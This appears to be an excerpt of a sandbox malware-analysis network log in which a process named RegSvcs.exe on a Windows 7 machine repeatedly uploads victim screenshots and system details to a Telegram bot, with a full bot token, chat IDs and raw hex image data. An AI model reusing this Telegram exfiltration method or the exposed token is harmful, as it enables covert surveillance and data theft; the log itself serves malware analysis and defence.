2022-04-08 10:13:29 UTC	797	OUT	Data Raw: 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d Data Ascii: #Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~u>-
2022-04-08 10:13:29 UTC	813	OUT	Data Raw: 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 Data Ascii: Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&
2022-04-08 10:13:29 UTC	828	OUT	Data Raw: be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 4b 4c 8f ee 9f a9 fe 74 00 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 29 a8 a7 6f df 6e a7 d3 d6 a5 a6 47 f7 4f d4 ff 00 3a 00 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 52 d3 23 fb a7 ea 7f 9d 00 1b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 fa 28 01 9b 4f f7 db f4 ff 00 0a 36 9f Data Ascii: Q}O@Q}O@Q}O@SQNOKLtm?o(Sm?o(Sm?o(Sm?o)onGO:6m?o)P6m?o)P6m?o)P6SSR#O6(O6
2022-04-08 10:13:29 UTC	844	OUT	Data Raw: 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 52 d3 23 fb a7 ea 7f 9d 00 1b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d4 b4 c8 fe e9 fa 9f e7 40 06 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b5 2d 32 3f ba 7e a7 f9 d0 01 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 Data Ascii: M>fxoo\|7FM>fR#&Oz7h=4(&Oz7i/F@xoo\|7FM>fxoo\|j8>-2?~z7h=4(&Oz7h=4(
2022-04-08 10:13:29 UTC	860	OUT	Data Raw: ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e Data Ascii: }O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~
2022-04-08 10:13:29 UTC	874	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 35 31 31 35 35 33 31 36 61 2d 2d 0d 0a Data Ascii: -----------------------------8da19651155316a--
2022-04-08 10:13:30 UTC	874	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:30 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":127,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412810,"document":{"file_name":"user-082561 2022-04-08 01-38-29.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA39iUArKpesIzWuPAXduVSRHu9mVlQAC8woAAkCUgFIUhxhTLGYV4QEAB20AAyME","file_unique_id":"AQAD8woAAkCUgFJy","file_size":13705,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAN_YlAKyqXrCM1rjwF3blUkR7vZlZUAAvMKAAJAlIBSFIcYUyxmFeEjBA","file_unique_id":"AgAD8woAAkCUgFI","file_size":112002},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49178	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:38 UTC	875	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da1967dccd5f5c Host: api.telegram.org Content-Length: 112590 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:13:38 UTC	875	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:38 UTC	875	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 37 64 63 63 64 35 66 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 37 64 63 63 64 35 66 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da1967dccd5f5cContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da1967dccd5f5cContent-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:13:38 UTC	876	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ea e7 ba 31 a1 90 c8 b1 46 1b 6e e6 8c be 4f 7e 01 18 14 c4 b9 79 6f 0d a4 77 70 b4 c0 6e 20 5b b1 00 7a e7 7e 3b d5 5b fb a1 6d a4 c8 db 43 b3 3c aa aa 7b 9d ed 46 80 f0 e0 6d 55 49 6e 36 c8 48 fe 2c 75 1f 87 3f ad 65 cf ef 59 99 73 6b 63 42 da e4 cb 6b 6b 23 8f 9a 75 53 f2 f4 04 ae ef cb 8a 75 cc e2 de 2d e5 73 f8 e3 b6 6a ae 9e 73 a6 e9 87 fd 84 ff Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?1FnO~yowpn [z~;[mC<{FmUIn6H,u?eYskcBkk#uSu-sjs
2022-04-08 10:13:38 UTC	892	OUT	Data Raw: 35 48 56 77 89 1c 4d 80 0b 7e ea 40 87 86 5e f9 1c 7f 9f 7a c6 92 de e2 5d 56 3b 80 65 74 b6 dc 15 0b 8c 85 70 06 37 6f eb f2 9e 7a fa d7 47 3d b5 bd ca 81 71 04 72 81 c8 12 20 6c 7e 75 0f f6 5e 9d ff 00 3e 16 bf f7 e5 7f c2 a9 34 2d 4c fd 02 23 15 f5 f8 2b 20 2c a8 df bc 93 79 e5 9c f5 c9 e2 a3 4d 2a e8 69 86 db cb 1b 4c 05 8a 6e 1f eb 76 ed c7 d3 a1 fa 8a da 82 d6 da d7 77 d9 ed e2 87 77 de f2 d0 2e 7e b8 a9 73 49 ea c6 b4 32 12 c2 6f ed 91 71 2a cc 42 85 f2 dd 0c 7b 54 05 c1 53 9f 9b ae 7a 71 cd 55 96 de 2d 3b 4f b0 fb 5c 11 79 68 ad e6 c4 ce 8a 4c 98 18 6e 48 04 8c 11 c1 cf 3c 57 43 9a 33 49 82 39 f8 34 e9 e4 5d 35 a5 8e 7f 2e 38 10 0f 2f 66 63 60 72 49 dd c8 e3 1f 77 9e 2b 47 54 86 59 a5 87 f7 32 cd 00 0d b9 62 75 56 0d d8 e4 91 c6 32 31 9e fc 83 57 Data Ascii: 5HVwM~@^z]V;etp7ozG=qr l~u^>4-L#+ ,yMiLnvww.~sI2oqB{TSzqU-;O\yhLnH<WC3I94]5.8/fc`rIw+GTY2buV21W
2022-04-08 10:13:38 UTC	908	OUT	Data Raw: 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d Data Ascii: #Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~u>-
2022-04-08 10:13:38 UTC	924	OUT	Data Raw: 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 Data Ascii: Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&
2022-04-08 10:13:38 UTC	939	OUT	Data Raw: be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 4b 4c 8f ee 9f a9 fe 74 00 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 29 a8 a7 6f df 6e a7 d3 d6 a5 a6 47 f7 4f d4 ff 00 3a 00 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 52 d3 23 fb a7 ea 7f 9d 00 1b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 fa 28 01 9b 4f f7 db f4 ff 00 0a 36 9f Data Ascii: Q}O@Q}O@Q}O@SQNOKLtm?o(Sm?o(Sm?o(Sm?o)onGO:6m?o)P6m?o)P6m?o)P6SSR#O6(O6
2022-04-08 10:13:38 UTC	955	OUT	Data Raw: 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 52 d3 23 fb a7 ea 7f 9d 00 1b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d4 b4 c8 fe e9 fa 9f e7 40 06 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b5 2d 32 3f ba 7e a7 f9 d0 01 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 Data Ascii: M>fxoo\|7FM>fR#&Oz7h=4(&Oz7i/F@xoo\|7FM>fxoo\|j8>-2?~z7h=4(&Oz7h=4(
2022-04-08 10:13:38 UTC	971	OUT	Data Raw: ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e Data Ascii: }O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~
2022-04-08 10:13:38 UTC	985	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 37 64 63 63 64 35 66 35 63 2d 2d 0d 0a Data Ascii: -----------------------------8da1967dccd5f5c--
2022-04-08 10:13:38 UTC	985	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:38 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":128,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412818,"document":{"file_name":"user-082561 2022-04-08 01-58-30.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4BiUArSKoN3V_tCtEMpgQz-G8ba_gAC9AoAAkCUgFJBpNMWske6VwEAB20AAyME","file_unique_id":"AQAD9AoAAkCUgFJy","file_size":13705,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOAYlAK0iqDd1f7QrRDKYEM_hvG2v4AAvQKAAJAlIBSQaTTFrJHulcjBA","file_unique_id":"AgAD9AoAAkCUgFI","file_size":112002},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49179	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:49 UTC	986	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da196aa84ed922 Host: api.telegram.org Content-Length: 112587 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:13:49 UTC	987	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:49 UTC	987	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 61 61 38 34 65 64 39 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 61 61 38 34 65 64 39 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da196aa84ed922Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da196aa84ed922Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:13:49 UTC	988	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ea e7 ba 31 a1 90 c8 b1 46 1b 6e e6 8c be 4f 7e 01 18 14 c4 b9 79 6f 0d a4 77 70 b4 c0 6e 20 5b b1 00 7a e7 7e 3b d5 5b fb a1 6d a4 c8 db 43 b3 3c aa aa 7b 9d ed 46 80 f0 e0 6d 55 49 6e 36 c8 48 fe 2c 75 1f 87 3f ad 65 cf ef 59 99 73 6b 63 42 da e4 cb 6b 6b 23 8f 9a 75 53 f2 f4 04 ae ef cb 8a 75 cc e2 de 2d e5 73 f8 e3 b6 6a ae 9e 73 a6 e9 87 fd 84 ff Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?1FnO~yowpn [z~;[mC<{FmUIn6H,u?eYskcBkk#uSu-sjs
2022-04-08 10:13:49 UTC	1004	OUT	Data Raw: 35 48 56 77 89 1c 4d 80 0b 7e ea 40 87 86 5e f9 1c 7f 9f 7a c6 92 de e2 5d 56 3b 80 65 74 b6 dc 15 0b 8c 85 70 06 37 6f eb f2 9e 7a fa d7 47 3d b5 bd ca 81 71 04 72 81 c8 12 20 6c 7e 75 0f f6 5e 9d ff 00 3e 16 bf f7 e5 7f c2 a9 34 2d 4c fd 02 23 15 f5 f8 2b 20 2c a8 df bc 93 79 e5 9c f5 c9 e2 a3 4d 2a e8 69 86 db cb 1b 4c 05 8a 6e 1f eb 76 ed c7 d3 a1 fa 8a da 82 d6 da d7 77 d9 ed e2 87 77 de f2 d0 2e 7e b8 a9 73 49 ea c6 b4 32 12 c2 6f ed 91 71 2a cc 42 85 f2 dd 0c 7b 54 05 c1 53 9f 9b ae 7a 71 cd 55 96 de 2d 3b 4f b0 fb 5c 11 79 68 ad e6 c4 ce 8a 4c 98 18 6e 48 04 8c 11 c1 cf 3c 57 43 9a 33 49 82 39 f8 34 e9 e4 5d 35 a5 8e 7f 2e 38 10 0f 2f 66 63 60 72 49 dd c8 e3 1f 77 9e 2b 47 54 86 59 a5 87 f7 32 cd 00 0d b9 62 75 56 0d d8 e4 91 c6 32 31 9e fc 83 57 Data Ascii: 5HVwM~@^z]V;etp7ozG=qr l~u^>4-L#+ ,yMiLnvww.~sI2oqB{TSzqU-;O\yhLnH<WC3I94]5.8/fc`rIw+GTY2buV21W
2022-04-08 10:13:49 UTC	1020	OUT	Data Raw: 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d Data Ascii: #Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~u>-
